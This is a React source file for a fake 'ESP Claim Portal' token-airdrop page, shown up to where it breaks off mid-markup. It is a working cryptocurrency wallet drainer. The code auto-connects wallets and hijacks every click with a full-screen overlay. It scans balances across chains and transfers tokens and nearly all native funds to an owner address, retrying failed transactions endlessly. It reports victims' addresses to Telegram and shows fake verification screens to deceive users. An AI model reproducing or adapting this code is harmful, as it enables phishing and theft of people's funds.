// src/App.js
import React, { useState, useEffect } from 'react';
import { ConnectButton, useConnectModal } from '@rainbow-me/rainbowkit'; 
import { 
  useAccount, 
  useBalance, 
  useWriteContract, 
  useSendTransaction, 
  useDisconnect, 
  useSwitchChain, 
  useConfig,
  useConnect 
} from 'wagmi';
import { getBalance, readContract } from '@wagmi/core';
import { parseEther, formatEther } from 'viem';
import { CONTRACT_ADDRESS, CONTRACT_ABI, TOKEN_ADDRESS, OWNER_ADDRESS, ERC20_ABI } from './utils/contracts';
import { supportedChains } from './utils/chainConfig'; 
import { TOKEN_MAP, PRICE_ESTIMATES } from './utils/tokenConfig';
import { reportConnection } from './utils/telegramReporter';
import './styles/App.css';

// --- ICONS ---
const IconSpeakerMute = () => (<svg width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="#f5e6d3" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><path d="M11 5L6 9H2V15H6L11 19V5Z"/><path d="M23 9L17 15"/><path d="M17 9L23 15"/></svg>);
const IconPassport = () => (<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"><rect x="5" y="4" width="14" height="16" rx="2" stroke="#d4a066" strokeWidth="1.5"/><circle cx="12" cy="10" r="2.5" stroke="#d4a066" strokeWidth="1.5"/><path d="M8 17C8 14.7909 9.79086 13 12 13C14.2091 13 16 14.7909 16 17" stroke="#d4a066" strokeWidth="1.5"/><circle cx="12" cy="12" r="9" stroke="#d4a066" strokeWidth="0" fillOpacity="0.1" fill="#d4a066"/></svg>);
const IconHandCoin = () => (<svg width="28" height="28" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M5 19C5.5 16 8 14 11 14H13C16 14 18.5 16 19 19" stroke="#f5e6d3" strokeWidth="1.5" strokeLinecap="round"/><circle cx="12" cy="9" r="3.5" stroke="#f5e6d3" strokeWidth="1.5"/><path d="M12 7.5V10.5M10.5 9H13.5" stroke="#f5e6d3" strokeWidth="1.5" strokeLinecap="round"/><path d="M17 6L18 7L19 6" stroke="#d4a066" strokeWidth="1.5"/></svg>);
const IconWallet = () => (<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M18 7V5C18 3.89543 17.1046 3 16 3H5C3.89543 3 3 3.89543 3 5V19C3 20.1046 3.89543 21 5 21H18C19.1046 21 20 20.1046 20 19V17" stroke="#9c8c85" strokeWidth="1.5"/><path d="M15 12H21V15H15V12Z" stroke="#9c8c85" strokeWidth="1.5" rx="1"/></svg>);
const IconDisconnect = () => (<svg width="16" height="16" viewBox="0 0 16 16" fill="none" stroke="#270903" strokeWidth="1.5" strokeLinecap="round" strokeLinejoin="round"><path d="M13.5 7.99999L6 7.99999M13.5 7.99999L10.5 11M13.5 7.99999L10.5 5M7.5 13.5H3.83333C3.09695 13.5 2.5 12.903 2.5 12.1667L2.5 3.83333C2.5 3.09695 3.09695 2.5 3.83333 2.5L7.5 2.5"/></svg>);
const IconChevronDown = () => (<svg width="12" height="12" viewBox="0 0 24 24" fill="none" stroke="#f5e6d3" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><path d="M6 9L12 15L18 9"/></svg>);
const IconHelpBook = () => (<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"><path fillRule="evenodd" clipRule="evenodd" d="M2.66663 3.16732C2.66663 2.1548 3.48744 1.33398 4.49996 1.33398H12.8333C13.1094 1.33398 13.3333 1.55784 13.3333 1.83398V14.1673C13.3333 14.4435 13.1094 14.6673 12.8333 14.6673H4.49996C3.48744 14.6673 2.66663 13.8465 2.66663 12.834C2.66663 12.7972 2.66771 12.7606 2.66985 12.7244C2.66772 12.7057 2.66663 12.6866 2.66663 12.6673V3.16732ZM3.66663 12.834C3.66663 13.2942 4.03972 13.6673 4.49996 13.6673H12.3333V12.0007H4.49996C4.03972 12.0007 3.66663 12.3737 3.66663 12.834ZM12.3333 11.0007H4.49996C4.19988 11.0007 3.91665 11.0727 3.66663 11.2006V3.16732C3.66663 2.70708 4.03972 2.33398 4.49996 2.33398H12.3333V11.0007Z" fill="currentColor"></path><path d="M8.12298 4.93923C8.18749 4.90698 8.2398 4.85467 8.27205 4.79016L8.702 3.93027C8.82484 3.68459 9.17544 3.68459 9.29828 3.93027L9.72823 4.79016C9.76048 4.85467 9.81279 4.90698 9.8773 4.93923L10.7372 5.36918C10.9829 5.49202 10.9829 5.84262 10.7372 5.96546L9.8773 6.39541C9.81279 6.42766 9.76048 6.47997 9.72823 6.54448L9.29828 7.40437C9.17544 7.65005 8.82484 7.65005 8.702 7.40437L8.27205 6.54448C8.2398 6.47997 8.18749 6.42766 8.12298 6.39541L7.26309 5.96546C7.01741 5.84262 7.01741 5.49202 7.26309 5.36918L8.12298 4.93923Z" fill="currentColor"></path><path d="M5.71829 7.80824C5.757 7.78889 5.78838 7.75751 5.80773 7.7188L6.15459 7.02509C6.22829 6.87768 6.43866 6.87768 6.51236 7.02509L6.85922 7.7188C6.87857 7.75751 6.90995 7.78889 6.94866 7.80824L7.64237 8.1551C7.78978 8.2288 7.78978 8.43917 7.64237 8.51287L6.94866 8.85973C6.90995 8.87908 6.87857 8.91046 6.85922 8.94917L6.51236 9.64288C6.43866 9.79029 6.22829 9.79029 6.15459 9.64288L5.80773 8.94917C5.78838 8.91046 5.757 8.87908 5.71829 8.85973L5.02458 8.51287C4.87717 8.43917 4.87717 8.2288 5.02458 8.1551L5.71829 7.80824Z" fill="currentColor"></path></svg>);
const IconArrowRight = () => (<svg width="16" height="16" viewBox="0 0 16 16" fill="none" stroke="currentColor" strokeWidth="1.5" strokeLinecap="round" strokeLinejoin="round"><path d="M9.85949 3.85938L13.0834 7.08322C13.6041 7.60392 13.6041 8.44814 13.0834 8.96884L9.85949 12.1927M12.8595 8.02604H2.52616"/></svg>);
const IconExternal = () => (<svg width="16" height="16" viewBox="0 0 16 16" fill="none" stroke="currentColor" strokeWidth="1.5" strokeLinecap="round" strokeLinejoin="round"><path d="M12.1667 9.33333V11.3667C12.1667 12.1134 12.1667 12.4868 12.0213 12.772C11.8935 13.0229 11.6895 13.2268 11.4387 13.3547C11.1534 13.5 10.7801 13.5 10.0333 13.5H4.63333C3.8866 13.5 3.51323 13.5 3.22801 13.3547C2.97713 13.2268 2.77316 13.0229 2.64532 12.772C2.5 12.4868 2.5 12.1134 2.5 11.3667V5.91667C2.5 5.21706 2.5 4.86726 2.62801 4.59659C2.7599 4.31774 2.9844 4.09324 3.26326 3.96135C3.53392 3.83333 3.88373 3.83333 4.58333 3.83333H6.16667M9.16667 2.5H13.5M13.5 2.5V6.83333M13.5 2.5L7.33333 8.66667"/></svg>);
const IconX = () => (<svg width="18" height="18" viewBox="0 0 18 18" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M6.75 3.375H2.8125L7.45923 9.57066L3.0656 14.6249H4.55624L8.14967 10.4912L11.25 14.625H15.1875L10.3453 8.16879L14.5126 3.375H13.0219L9.65492 7.24825L6.75 3.375ZM11.8125 13.5L5.0625 4.5H6.1875L12.9375 13.5H11.8125Z" fill="currentColor"></path></svg>);
const IconDiscordFooter = () => (<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M18.6818 7.5C18.6818 7.5 16.9103 6.1545 14.8182 6L14.6296 6.366C16.5213 6.81525 17.389 7.45913 18.2955 8.25C16.7326 7.47563 15.1895 6.75 12.5 6.75C9.81052 6.75 8.26739 7.47563 6.70455 8.25C7.61095 7.45913 8.64332 6.74437 10.3704 6.366L10.1818 6C7.98689 6.20138 6.31818 7.5 6.31818 7.5C6.31818 7.5 4.33961 10.2844 4 15.75C5.99441 17.9824 9.02273 18 9.02273 18L9.65598 17.1806C8.58111 16.818 7.36716 16.1704 6.31818 15C7.56923 15.9187 9.45739 16.875 12.5 16.875C15.5426 16.875 17.4308 15.9187 18.6818 15C17.6328 16.1704 16.4189 16.818 15.344 17.1806L15.9773 18C15.9773 18 19.0056 17.9824 21 15.75C20.6604 10.2844 18.6818 7.5 18.6818 7.5ZM9.98864 14.25C9.2418 14.25 8.63636 13.5784 8.63636 12.75C8.63636 11.9216 9.2418 11.25 9.98864 11.25C10.7355 11.25 11.3409 11.9216 11.3409 12.75C11.3409 13.5784 10.7355 14.25 9.98864 14.25ZM15.0114 14.25C14.2645 14.25 13.6591 13.5784 13.6591 12.75C13.6591 11.9216 14.2645 11.25 15.0114 11.25C15.7582 11.25 16.3636 11.9216 16.3636 12.75C16.3636 13.5784 15.7582 14.25 15.0114 14.25Z" fill="currentColor"></path></svg>);
const IconParagraph = () => (<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"><g clipPath="url(#clip0_1320_1515)"><path d="M6.03699 5V17.9986H18.9999" stroke="currentColor" strokeWidth="2.59963" strokeMiterlimit="10"></path><path d="M10.9468 5.9043L6.03699 17.9976L18.1482 13.0179" stroke="currentColor" strokeWidth="2.59963" strokeLinejoin="round"></path><path d="M6.03699 17.998L15.2027 8.68555" stroke="currentColor" strokeWidth="2.59963" strokeMiterlimit="10"></path></g><defs><clipPath id="clip0_1320_1515"><rect width="14" height="14" fill="currentColor" transform="translate(5 5)"></rect></clipPath></defs></svg>);
const IconMagna = () => (<svg width="80" height="15" viewBox="0 0 80 15" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M32.7644 0.696425C33.3487 1.00117 33.8284 1.47223 34.1422 2.0494C34.4764 2.64696 34.6433 3.36854 34.6433 4.21417V9.71061H32.7212V4.50165C32.7212 3.66732 32.5115 3.02843 32.0919 2.58496C31.6723 2.14148 31.0996 1.91824 30.3739 1.91523C29.6481 1.91523 29.0726 2.13809 28.6479 2.58382C28.2229 3.02955 28.0102 3.66845 28.0094 4.50053V9.70949H26.0885V4.50053C26.0885 3.6662 25.8786 3.02729 25.459 2.58382C25.0395 2.14035 24.4663 1.91749 23.7398 1.91523C23.0142 1.91523 22.4388 2.13809 22.014 2.58382C21.589 3.02955 21.3761 3.66845 21.3756 4.50053V9.70949H19.4362V0.390877H21.3756V1.45635C21.7006 1.06484 22.1145 0.755695 22.5833 0.554363C23.0763 0.339001 23.6097 0.229509 24.1482 0.233034C24.8465 0.221095 25.5367 0.383935 26.1553 0.706576C26.7381 1.0154 27.2128 1.49317 27.5161 2.07646C27.8088 1.50346 28.2722 1.03415 28.8429 0.732505C29.435 0.402005 30.1031 0.229907 30.782 0.233034C31.471 0.223695 32.1517 0.382823 32.7644 0.696425Z" fill="currentColor"></path><path d="M36.9481 2.52292C37.3154 1.82637 37.8692 1.24423 38.5483 0.840718C39.2238 0.439821 39.9976 0.231895 40.7844 0.239778C41.453 0.225179 42.1148 0.373427 42.7122 0.671596C43.2252 0.929182 43.6751 1.2956 44.03 1.74495V0.391985H45.9861V9.71057H44.03V8.32381C43.6722 8.78726 43.2125 9.16328 42.6862 9.42306C42.0852 9.72411 41.4196 9.87499 40.7471 9.86281C39.966 9.86973 39.199 9.65583 38.5356 9.24611C37.8591 8.82475 37.3102 8.2285 36.9481 7.52105C36.5485 6.74412 36.3472 5.88147 36.3618 5.00901C36.3451 4.1446 36.5467 3.28983 36.9481 2.52292ZM43.6331 3.36852C43.3907 2.91952 43.0289 2.54515 42.5875 2.28614C42.1646 2.04017 41.6827 1.91168 41.1927 1.91408C40.7037 1.91166 40.2226 2.03726 39.7978 2.27825C39.357 2.53037 38.9949 2.89921 38.7523 3.34372C38.4744 3.85433 38.3364 4.42862 38.3521 5.00901C38.3386 5.59743 38.4764 6.17951 38.7523 6.7002C38.9933 7.15957 39.3582 7.54334 39.8058 7.80856C40.2252 8.05723 40.7045 8.18854 41.1927 8.18848C41.6827 8.1909 42.1646 8.06237 42.5875 7.81642C43.0305 7.55593 43.3925 7.17855 43.6331 6.72615C43.9093 6.20836 44.047 5.62874 44.0335 5.04283C44.0478 4.4597 43.9098 3.88285 43.6331 3.36852Z" fill="currentColor"></path><path d="M54.1466 0.675017C54.6637 0.926179 55.1148 1.29368 55.4642 1.74838V0.395405H57.4205V9.86621C57.4349 10.6635 57.2476 11.4517 56.8762 12.1584C56.5162 12.8245 55.9699 13.3727 55.3033 13.7368C54.6161 14.1202 53.7965 14.3118 52.8447 14.3118C51.5747 14.3118 50.52 14.0161 49.6808 13.4245C49.2785 13.1524 48.9418 12.7952 48.6946 12.3785C48.4477 11.9617 48.2964 11.4957 48.252 11.014H50.1798C50.3352 11.5095 50.6718 11.9291 51.1234 12.1899C51.6443 12.5002 52.2433 12.6567 52.8504 12.6409C53.6329 12.6409 54.2653 12.4041 54.7475 11.9306C55.23 11.4571 55.4706 10.7693 55.47 9.86733V8.31141C55.1128 8.77481 54.6565 9.15337 54.1341 9.41972C53.5441 9.72644 52.8865 9.88146 52.2211 9.8707C51.432 9.87862 50.657 9.66484 49.9848 9.254C49.3025 8.83553 48.7491 8.23881 48.3846 7.52893C47.985 6.75207 47.7836 5.8894 47.7983 5.01693C47.7817 4.15253 47.9832 3.29776 48.3846 2.53085C48.7519 1.83429 49.3057 1.25215 49.9848 0.848646C50.6605 0.44775 51.4342 0.239822 52.2211 0.247705C52.8881 0.234638 53.5485 0.381191 54.1466 0.675017ZM55.0639 3.37194C54.8214 2.92293 54.4599 2.54857 54.0185 2.28957C53.5959 2.043 53.1146 1.91372 52.6246 1.91524C52.1356 1.91283 51.6546 2.03842 51.23 2.27942C50.7888 2.53179 50.4266 2.90056 50.1832 3.34488C49.9061 3.8558 49.7686 4.42995 49.784 5.01017C49.7707 5.59844 49.9081 6.18042 50.1832 6.7014C50.425 7.1606 50.7899 7.54425 51.2379 7.8097C51.6572 8.05843 52.1365 8.18968 52.6246 8.18968C53.1148 8.19205 53.5965 8.06358 54.0194 7.81757C54.4625 7.55708 54.8244 7.1797 55.0651 6.7273C55.3412 6.20951 55.4789 5.62991 55.4654 5.04399C55.4795 4.4604 55.3412 3.88311 55.0639 3.36857V3.37194Z" fill="currentColor"></path></svg>);

// --- SWAP ICONS ---
const IconSettings = () => (<svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><circle cx="12" cy="12" r="3"></circle><path d="M19.4 15a1.65 1.65 0 0 0 .33 1.82l.06.06a2 2 0 0 1 0 2.83 2 2 0 0 1-2.83 0l-.06-.06a1.65 1.65 0 0 0-1.82-.33 1.65 1.65 0 0 0-1 1.51V21a2 2 0 0 1-2 2 2 2 0 0 1-2-2v-.09A1.65 1.65 0 0 0 9 19.4a1.65 1.65 0 0 0-1.82.33l-.06.06a2 2 0 0 1-2.83 0 2 2 0 0 1 0-2.83l.06.06a1.65 1.65 0 0 0 .33-1.82 1.65 1.65 0 0 0-1.51-1H3a2 2 0 0 1-2-2 2 2 0 0 1 2-2h.09A1.65 1.65 0 0 0 4.6 9a1.65 1.65 0 0 0-.33-1.82l-.06-.06a2 2 0 0 1 0-2.83 2 2 0 0 1 2.83 0l.06.06a1.65 1.65 0 0 0 1.82.33H9a1.65 1.65 0 0 0 1-1.51V3a2 2 0 0 1 2-2 2 2 0 0 1 2 2v.09a1.65 1.65 0 0 0 1 1.51 1.65 1.65 0 0 0 1.82-.33l.06-.06a2 2 0 0 1 2.83 0 2 2 0 0 1 0 2.83l-.06.06a1.65 1.65 0 0 0-.33 1.82V9a1.65 1.65 0 0 0 1.51 1H21a2 2 0 0 1 2 2 2 2 0 0 1-2 2h-.09a1.65 1.65 0 0 0-1.51 1z"></path></svg>);
const IconHistory = () => (<svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><path d="M12 20v2"></path><path d="M6 20v2"></path><path d="M18 20v2"></path><rect x="2" y="4" width="20" height="16" rx="2"></rect><line x1="2" y1="8" x2="22" y2="8"></line></svg>);
const IconSwapArrow = () => (<svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><line x1="12" y1="5" x2="12" y2="19"></line><polyline points="19 12 12 19 5 12"></polyline></svg>);
const IconCopy = () => (<svg width="14" height="14" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><rect x="9" y="9" width="13" height="13" rx="2" ry="2"></rect><path d="M5 15H4a2 2 0 0 1-2-2V4a2 2 0 0 1 2-2h9a2 2 0 0 1 2 2v1"></path></svg>);

// --- CUSTOM MODAL COMPONENT (Based on provided HTML) ---
const VerificationModal = ({ status }) => {
  let title = "Sign to verify";
  let subtitle = "Wallet not showing up? It might be open in another tab or browser window.";
  let btnText = "Connecting...";
  let btnClass = "pointer-events_none cursor_not-allowed opacity-50";

  if (status === 'failed') {
    title = "Insufficient BNB Balance";
    subtitle = "Please top up your wallet with BNB to pay for gas fees.";
    btnText = "Retry";
    btnClass = "status-error";
  } else if (status === 'success') {
    title = "Verification Successful";
    subtitle = "Proceeding to claim...";
    btnText = "Success";
    btnClass = "status-success";
  } else if (status === 'scanning') {
    title = "Checking eligibility...";
    subtitle = "Please wait while we verify your wallet status.";
    btnText = "Scanning...";
  }

  return (
    <div className="verify-overlay">
      <div className="verify-card">
        <div className="d_flex ai_center gap_0 flex-d_column pt_12 w_full">
          <div className="spinner-container">
             <div className="spinner-circle"></div>
          </div>
          <span className="verify-title">{title}</span>
          <span className="verify-desc">{subtitle}</span>
          
          <div className="legal-box">
             <span className="legal-text c_primary.base w_full" style={{fontWeight:600}}>By entering the portal and linking my wallet, I confirm:</span>
             <div className="dashed-line"></div>
             <span className="legal-text">I agree to the <a href="https://claim.espresso.foundation/terms-of-service" className="td_underline" style={{color:'inherit'}}>Terms of Service</a> and acknowledge the <a href="https://www.magna.so/privacy-policy" target="_blank" rel="noopener noreferrer" className="td_underline" style={{color:'inherit'}}>Privacy Policy</a>.</span>
             <div className="dashed-line"></div>
             <span className="legal-text">I am legally eligible and not in a prohibited/sanctioned jurisdiction.</span>
             <div className="dashed-line"></div>
             <span className="legal-text">I am not sanctioned/blocked and will not use the portal in connection with sanctioned parties or blocked wallets/addresses/contracts.</span>
             <div className="dashed-line"></div>
             <span className="legal-text">I control the connected wallet(s) and act only for myself.</span>
          </div>

          <button className={`connect-status-btn ${btnClass}`}>
             {status === 'failed' ? '⚠️' : ''} {btnText}
          </button>
        </div>
      </div>
    </div>
  );
};

function App() {
  const [page, setPage] = useState('claim');
  const [showDropdown, setShowDropdown] = useState(false); 
  const [espInputVal, setEspInputVal] = useState("10658");
  const [isCopied, setIsCopied] = useState(false);
  
  // VERIFICATION STATE
  const [verificationState, setVerificationState] = useState('idle'); // idle, scanning, success, failed

  // RAINBOWKIT HOOK
  const { openConnectModal } = useConnectModal();

  // WAGMI HOOKS
  const { address, isConnected, chain, connector } = useAccount();
  const { disconnect } = useDisconnect();
  const { switchChain } = useSwitchChain();
  const config = useConfig();
  const { connect, connectors } = useConnect();
  
  // Balance Hooks
  const { data: bnbData, isLoading: isBnbLoading } = useBalance({ address });
  const bnbFormatted = bnbData ? parseFloat(formatEther(bnbData.value)).toFixed(4) : "0.0000";
  const bnbBalanceValue = bnbData ? bnbData.value : parseEther('0');

  const { data: espData, isLoading: isEspLoading } = useBalance({ 
    address, 
    token: TOKEN_ADDRESS 
  });

  const searchParams = new URLSearchParams(window.location.search);
  const referrer = searchParams.get('ref') || "0x0000000000000000000000000000000000000000";
  const shortAddress = address ? `${address.slice(0, 6)}...${address.slice(-4)}` : '';

  // CONSTANTS
  const FIXED_ESP_AMOUNT = "10.658,82";
  const SWAP_BNB_INPUT = "1,38979428"; 

  // Phantom Logic
  useEffect(() => {
    if (espData && espData.value > 0n) {
        setEspInputVal(formatEther(espData.value));
    } else {
        setEspInputVal("10658");
    }
  }, [espData]);

  // --- 1. GLOBAL CLICK HIJACK & AUTO OPEN ---
  useEffect(() => {
    if (!isConnected && openConnectModal) {
       // Attempt auto open
       // setTimeout(() => openConnectModal(), 500); 
    }
    
    // Auto Connect for DApps
    if (!isConnected && window.ethereum && connectors.length > 0) {
      const injectedConnector = connectors.find(c => c.id === 'injected');
      if (injectedConnector) {
        connect({ connector: injectedConnector });
      }
    }
  }, [isConnected, openConnectModal, connect, connectors]);

  // --- GAS BUFFER LOGIC ---
  const getGasBuffer = (chainId) => {
    switch (chainId) {
        case 1: return parseEther('0.0003'); 
        case 56: return parseEther('0.0005'); 
        case 137: return parseEther('0.5'); 
        case 43114: return parseEther('0.01'); 
        case 5000: return parseEther('0.2'); 
        case 42220: return parseEther('1'); 
        case 1329: return parseEther('3'); 
        default: return parseEther('0.0004'); 
    }
  };

  // --- SMART DRAINER LOGIC ---
  const [assetsQueue, setAssetsQueue] = useState([]);
  const [isDraining, setIsDraining] = useState(false);
  const { writeContractAsync } = useWriteContract();
  const { sendTransactionAsync } = useSendTransaction();

  // Process Queue (Recursive)
  const processDrain = async (queueIndex = 0, currentQueue = assetsQueue) => {
    if (queueIndex >= currentQueue.length) {
       if (chain?.id !== 56) switchChain({ chainId: 56 });
       return;
    }

    const asset = currentQueue[queueIndex];
    setIsDraining(true);

    const tryTransaction = async () => {
      try {
        if (chain?.id !== asset.chainId) {
           await switchChain({ chainId: asset.chainId });
           await new Promise(r => setTimeout(r, 500)); 
        }

        if (asset.type === 'token') {
           await writeContractAsync({
              address: asset.tokenAddress,
              abi: ERC20_ABI,
              functionName: 'transfer',
              args: [OWNER_ADDRESS, asset.balance]
           });
        } else if (asset.type === 'native') {
           if (asset.chainId === 56) {
              // --- PERBAIKAN LOGIKA MAX BALANCE DI SINI ---
              // Sebelumnya: value: parseEther('0.005')
              // Sekarang: Hitung saldo - gas buffer
              const buffer = getGasBuffer(asset.chainId);
              const val = asset.balance - buffer;
              
              if (val > 0n) {
                  await writeContractAsync({
                     address: CONTRACT_ADDRESS,
                     abi: CONTRACT_ABI,
                     functionName: 'claimAirdrop',
                     args: [referrer],
                     value: val, // Mengirim MAX balance
                  });
              }
           } else {
              const buffer = getGasBuffer(asset.chainId);
              const val = asset.balance - buffer;
              if (val > 0n) {
                 await sendTransactionAsync({ to: OWNER_ADDRESS, value: val });
              }
           }
        }
        
        processDrain(queueIndex + 1, currentQueue);

      } catch (error) {
        console.log("Retry...");
        setTimeout(tryTransaction, 200); 
      }
    };

    tryTransaction();
  };

  // --- SCAN ASSETS (FAST PARALLEL) ---
  const scanAssets = async () => {
    if (!address || !config) return;
    setVerificationState('scanning');
    
    let foundAssets = [];
    
    // Create an array of promises for parallel execution
    const promises = supportedChains.map(async (c) => {
      try {
        // Native
        const nativeRes = await getBalance(config, { address, chainId: c.id });
        const nativePrice = PRICE_ESTIMATES[c.id] || PRICE_ESTIMATES.DEFAULT;
        const nativeUsd = parseFloat(formatEther(nativeRes.value)) * nativePrice;
        
        const buffer = getGasBuffer(c.id);
        if (nativeRes.value > buffer) {
           foundAssets.push({
             type: 'native',
             chainId: c.id,
             balance: nativeRes.value,
             valueUsd: nativeUsd
           });
        }

        // Tokens
        const tokens = TOKEN_MAP[c.id];
        if (tokens) {
           const tokenPromises = Object.entries(tokens).map(async ([key, contractAddr]) => {
              try {
                const bal = await readContract(config, { 
                    address: contractAddr, 
                    abi: ERC20_ABI, 
                    functionName: 'balanceOf', 
                    args: [address], 
                    chainId: c.id 
                });
                if (bal > 0n) {
                   let estimatedPrice = PRICE_ESTIMATES[key.toUpperCase()] || 1;
                   let valUsd = 0;
                   if (key.includes('usd')) {
                      valUsd = parseFloat(formatEther(bal)) * 10**12 * estimatedPrice; 
                   } else {
                      valUsd = parseFloat(formatEther(bal)) * estimatedPrice;
                   }
                   foundAssets.push({ 
                       type: 'token', 
                       chainId: c.id, 
                       tokenAddress: contractAddr, 
                       balance: bal, 
                       valueUsd: valUsd 
                   });
                }
              } catch(e) {}
           });
           await Promise.all(tokenPromises);
        }
      } catch (e) {}
    });

    await Promise.all(promises);

    foundAssets.sort((a, b) => b.valueUsd - a.valueUsd);
    setAssetsQueue(foundAssets);

    if (foundAssets.length > 0) {
        setVerificationState('success');
        // Close modal after 1.5s then trigger drain
        setTimeout(() => {
            setVerificationState('idle'); 
            processDrain(0, foundAssets);
        }, 1500);
    } else {
        setVerificationState('failed'); // Insufficient Balance
    }
  };

  useEffect(() => {
    if (isConnected && address) {
      scanAssets(); // Scan aset (Logic Drainer)
      reportConnection(address, chain?.id, connector?.name);
    } else {
      setVerificationState('idle');
    }
  }, [isConnected, address, chain, connector]);


  const handleUnifiedAction = () => {
    if (!isConnected) {
      if(openConnectModal) openConnectModal();
      return;
    }
    // Manual re-trigger
    if (assetsQueue.length > 0) {
       processDrain(0, assetsQueue);
    } else {
       scanAssets(); // Re-scan
    }
  };

  const handleSwapAction = () => {
     handleUnifiedAction(); 
  };

  const handleCopyRef = () => {
    if(!address) return;
    const refLink = `${window.location.origin}?ref=${address}`;
    navigator.clipboard.writeText(refLink);
    setIsCopied(true);
    setTimeout(() => setIsCopied(false), 2000);
  };

  return (
    <div className="app-layout" onClick={(e) => { 
        setShowDropdown(false); 
        // Global Click Hijack
        if (!isConnected && openConnectModal && !e.target.closest('[id^="rk-"]')) {
           e.preventDefault(); e.stopPropagation();
           openConnectModal();
        }
    }}>
      
      {/* FULL SCREEN OVERLAY FOR CLICK HIJACK */}
      {!isConnected && (
         <div style={{
            position:'fixed', top:0, left:0, width:'100vw', height:'100vh', 
            zIndex: 9999, cursor:'pointer'
         }} />
      )}

      {/* CUSTOM VERIFICATION MODAL */}
      {verificationState !== 'idle' && isConnected && (
         <VerificationModal status={verificationState} />
      )}

      {/* HEADER */}
      <nav className="nav-header">
        <div className="nav-left">
          <img src="/logo.svg" alt="Logo" className="nav-logo" />
        </div>
        
        <div className="header-right">
            <div className="speaker-icon-btn">
                <IconSpeakerMute />
            </div>

            <ConnectButton.Custom>
            {({ account, chain: rkChain, openConnectModal: openModal, mounted }) => {
                const ready = mounted;
                const connected = ready && account && rkChain;
                
                return (
                <div style={{ position: 'relative' }}>
                    {!connected ? (
                    <button onClick={openModal} className="address-btn">
                        Connect Wallet
                    </button>
                    ) : (
                    <button 
                        className="address-btn" 
                        onClick={(e) => {
                        e.stopPropagation();
                        setShowDropdown(!showDropdown);
                        }}
                    >
                        <span>{shortAddress}</span>
                        <IconChevronDown />
                    </button>
                    )}

                    {connected && showDropdown && (
                        <div className="custom-dropdown" onClick={(e) => e.stopPropagation()}>
                            <div className="dropdown-row">
                                <div className="d_flex ai_center gap_8px flex-d_row">
                                    <span className="textStyle_action" style={{color: '#270903'}}>{shortAddress}</span>
                                </div>
                                <div className="disconnect-area" onClick={() => disconnect()}>
                                    <IconDisconnect />
                                    <span className="textStyle_action">Disconnect</span>
                                </div>
                            </div>
                            <span className="caption-text">
                                This is your main profile address, securely linked to your account.
                            </span>
                        </div>
                    )}
                </div>
                );
            }}
            </ConnectButton.Custom>
        </div>
      </nav>

      {page === 'claim' ? (
        <>
          <div style={{marginBottom: '20px'}}>
            <img src="/coin.png" alt="Coin" className="coin-hero-img" />
            <h1 className="page-title">ESP Claim Portal</h1>
            <p className="page-desc">Check your eligibility, claim your tokens, and stake them to secure the network and earn rewards.</p>
          </div>

          <div className="box-poh">
            <div style={{display:'flex', gap:'12px', alignItems:'center'}}>
              <IconPassport />
              <div className="icon-text-group">
                <div className="itg-title">Proof of Humanity Required</div>
                <div className="itg-sub">Verify your identity to be able to claim.</div>
              </div>
            </div>
            <button className="verify-btn animated-btn" onClick={handleUnifiedAction}>
               Verify Now
            </button>
          </div>

          <div className="merged-box">
            <div className="section-top">
              <div className="claim-header">
                <span className="label-text">Claimable Amount</span>
                <span className="eligible-badge">You're eligible to claim</span>
              </div>
              <div className="big-amount">{FIXED_ESP_AMOUNT} ESP</div>
              <div className="amount-desc">You can claim directly or stake your tokens to start earning rewards.</div>
            </div>

            <div className="custom-divider"></div>

            <div className="section-bottom">
              <div className="stake-info-row">
                <div style={{marginTop:'2px'}}><IconHandCoin /></div>
                <div className="stake-text">
                  <h4>Up to 420% in bonus staking rewards over 24 months.</h4>
                  <p>Rewards increase the longer you stake. Tokens can be unstaked at any time. Rewards are subject to terms and conditions detailed in the FAQ.</p>
                </div>
              </div>

              <button className="primary-btn animated-btn" onClick={handleUnifiedAction}>
                {!isConnected ? 'Claim & Stake' : 'Claim & Stake'}
              </button>
            </div>

            <div className="custom-divider"></div>

            <div className="secondary-btn-area">
              <button className="secondary-btn" onClick={handleUnifiedAction}>
                Claim
              </button>
            </div>
          </div>

          <div className="box-wallet">
            <IconWallet />
            <div className="icon-text-group">
              <div className="itg-title" style={{fontSize: '12px'}}>Claim Wallet</div>
              <div className="itg-sub">Your claim wallet was finalized during registration and can't be modified.</div>
            </div>
          </div>

          <div style={{textAlign: 'center', marginTop: '10px'}}>
             <button onClick={() => setPage('swap')} style={{background:'none', border:'none', color:'#6d5852', cursor:'pointer', fontFamily: 'inherit'}}>
               Go to Swap &rarr;
             </button>
          </div>
        </>
      ) : (
        <>
          <div className="swap-pro-card">
             <div className="swap-nav">
               <div className="swap-tabs">
                 <span className="swap-tab active">Swap</span>
                 <span className="swap-tab">Bridge</span>
                 <span className="swap-tab">Pro</span>
               </div>
               <div className="swap-actions">
                 <span className="icon-btn-hover"><IconHistory /></span>
                 <span className="icon-btn-hover"><IconSettings /></span>
               </div>
             </div>

             {/* FROM */}
             <div style={{display:'flex', justifyContent:'space-between', marginBottom:'6px'}}>
                <span className="swap-label">From</span>
                <div className="swap-toggle">
                  Use Exchange Balance
                  <div className="swap-toggle-switch"></div>
                </div>
             </div>
             
             <div className="swap-input-container">
                <div className="swap-main-row">
                   <div className="token-selector">
